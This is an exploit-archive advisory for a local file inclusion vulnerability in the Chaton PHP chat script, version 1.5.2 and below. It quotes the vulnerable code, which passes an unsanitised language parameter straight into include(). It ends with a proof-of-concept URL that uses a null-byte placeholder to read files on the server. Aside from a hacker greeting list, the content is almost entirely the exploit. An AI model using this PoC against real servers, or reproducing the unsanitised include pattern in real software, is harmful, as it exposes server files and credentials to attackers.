24 lines
No EOL
863 B
Text
Executable file
24 lines
No EOL
863 B
Text
Executable file
[+] Chaton <= 1.5.2 Local File Include Vulnerability
|
|
[+] Discovered By: cr4wl3r
|
|
[+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip
|
|
[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend
|
|
|
|
[+] Code:
|
|
|
|
if (file_exists( "lang/$chat_lang/deplacer.php")) {
|
|
include( "lang/$chat_lang/deplacer.php");
|
|
}
|
|
|
|
if ($chat_salon != $newsalon) {
|
|
if ($chat_hide == false) {
|
|
// Salle publique = Recupere le vrai nom
|
|
$nomsalle = NomSalonPublic( $newsalon);
|
|
if ($nomsalle == '') {
|
|
// Salon priv?
|
|
$salon_prive = true;
|
|
$nomsalle = $newsalon;
|
|
} else {
|
|
$salon_prive = false;
|
|
}
|
|
|
|
[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00] |